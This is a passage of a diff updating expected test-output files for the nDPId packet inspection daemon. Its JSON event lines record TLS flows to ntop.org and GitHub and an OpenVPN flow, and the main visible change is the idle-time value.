00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581109488079,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581109488079,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG7z2h4KhDzLWDtqaAS\/ojkXQAAAgQFrAQCCAolMJ2OHivVZQEDAwc="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581109488079,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581109488079,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7Fgs9oAbstYO2peCoQ9IAQECwBWgAAAQEICh4r1YolMJ2O"}
00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581109488041,"flow_last_seen":1581109488081,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581109488081,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581109488041,"flow_last_seen":1581109488123,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1581109488123,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"3653a20186a5b490426131a611e01992","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
01165{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581109488041,"flow_last_seen":1581109488123,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3397,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1581109488123,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"3653a20186a5b490426131a611e01992","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}}
00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":667,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":667,"flow_first_seen":1581109488041,"flow_last_seen":1581109496480,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":414073,"flow_avg_l4_payload_len":620,"midstream":0,"thread_ts_msec":1581109496480,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}}
00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":667,"source":"443-firefox.pcap","alias":"nDPId-test","packets-captured":667,"packets-processed":667,"total-skipped-flows":0,"total-l4-data-len":414073,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1581109496480}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 667/667

16
test/results/443-git.pcap.out
View File

@@ -1,13 +1,13 @@
00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"443-git.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"443-git.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1581113657633}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581113657633,"flow_last_seen":1581113657633,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581113657633,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581113657633,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581113657633,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGeqzAqAENjFJyBNnAAbv0\/p5\/AAAAALAC\/\/+NzAAAAgQFtAEDAwUBAQgKHmpbwAAAAAAEAgAA"}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581113657744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581113657744,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGiLCMUnIEwKgBDQG72cCAzdDM9P6egKASb0C\/0wAAAgQFnAQCCAoOCxAaHmpbwAEDAwo="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581113657744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581113657744,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGerjAqAENjFJyBNnAAbv0\/p6AgM3QzYAQECpNNAAAAQEICh5qXC0OCxAa"}
00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581113657633,"flow_last_seen":1581113657751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581113657751,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1581113657633,"flow_last_seen":1581113657863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1941,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1581113657863,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581113657633,"flow_last_seen":1581113657863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":4067,"flow_avg_l4_payload_len":581,"midstream":0,"thread_ts_msec":1581113657863,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","server_names":"github.com,www.github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com","alpn":"http\/1.1","fingerprint":"CA:06:F5:6B:25:8B:7A:0D:4F:2B:05:47:09:39:47:86:51:15:19:84"}}
00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":70,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":70,"flow_first_seen":1581113657633,"flow_last_seen":1581113658456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":32585,"flow_avg_l4_payload_len":465,"midstream":0,"thread_ts_msec":1581113658456,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581113657633,"flow_last_seen":1581113657633,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581113657633,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581113657633,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581113657633,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGeqzAqAENjFJyBNnAAbv0\/p5\/AAAAALAC\/\/+NzAAAAgQFtAEDAwUBAQgKHmpbwAAAAAAEAgAA"}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581113657744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581113657744,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGiLCMUnIEwKgBDQG72cCAzdDM9P6egKASb0C\/0wAAAgQFnAQCCAoOCxAaHmpbwAEDAwo="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581113657744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581113657744,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGerjAqAENjFJyBNnAAbv0\/p6AgM3QzYAQECpNNAAAAQEICh5qXC0OCxAa"}
00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581113657633,"flow_last_seen":1581113657751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581113657751,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1581113657633,"flow_last_seen":1581113657863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1941,"flow_avg_l4_payload_len":388,"midstream":0,"thread_ts_msec":1581113657863,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581113657633,"flow_last_seen":1581113657863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":4067,"flow_avg_l4_payload_len":581,"midstream":0,"thread_ts_msec":1581113657863,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"github.com","server_names":"github.com,www.github.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com","alpn":"http\/1.1","fingerprint":"CA:06:F5:6B:25:8B:7A:0D:4F:2B:05:47:09:39:47:86:51:15:19:84"}}
00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":70,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":70,"flow_first_seen":1581113657633,"flow_last_seen":1581113658456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":32585,"flow_avg_l4_payload_len":465,"midstream":0,"thread_ts_msec":1581113658456,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Github","breed":"Acceptable","category":"Collaborative"}}
00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":70,"source":"443-git.pcap","alias":"nDPId-test","packets-captured":70,"packets-processed":70,"total-skipped-flows":0,"total-l4-data-len":32585,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1581113658456}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 70/70

12
test/results/443-opvn.pcap.out
View File

@@ -1,11 +1,11 @@
00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"443-opvn.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"443-opvn.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1581153175528}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581153175528,"flow_last_seen":1581153175528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581153175528,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581153175528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581153175528,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+EfAqAFUwAzAZ87tBKpga1quAAAAALAC\/\/\/PlAAAAgQFtAEDAwUBAQgKFg2AOQAAAAAEAgAA"}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581153175550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581153175550,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADYGAkzADMBnwKgBVASqzu1gWZU1YGtar6AScSBwigAAAgQFrAQCCAocQO0VFg2AOQEDAwY="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581153175550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581153175550,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+FPAqAFUwAzAZ87tBKpga1qvYFmVNoAQECwALgAAAQEIChYNgE0cQO0V"}
00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581153175528,"flow_last_seen":1581153176626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1581153176626,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}}
00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1581153175528,"flow_last_seen":1581153184491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8517,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1581153184491,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581153175528,"flow_last_seen":1581153175528,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581153175528,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581153175528,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581153175528,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+EfAqAFUwAzAZ87tBKpga1quAAAAALAC\/\/\/PlAAAAgQFtAEDAwUBAQgKFg2AOQAAAAAEAgAA"}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581153175550,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581153175550,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADYGAkzADMBnwKgBVASqzu1gWZU1YGtar6AScSBwigAAAgQFrAQCCAocQO0VFg2AOQEDAwY="}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581153175550,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581153175550,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+FPAqAFUwAzAZ87tBKpga1qvYFmVNoAQECwALgAAAQEIChYNgE0cQO0V"}
00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581153175528,"flow_last_seen":1581153176626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1581153176626,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}}
00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":46,"source":"443-opvn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1581153175528,"flow_last_seen":1581153184491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8517,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1581153184491,"l3_proto":"ip4","src_ip":"192.168.1.84","dst_ip":"192.12.192.103","src_port":52973,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}}
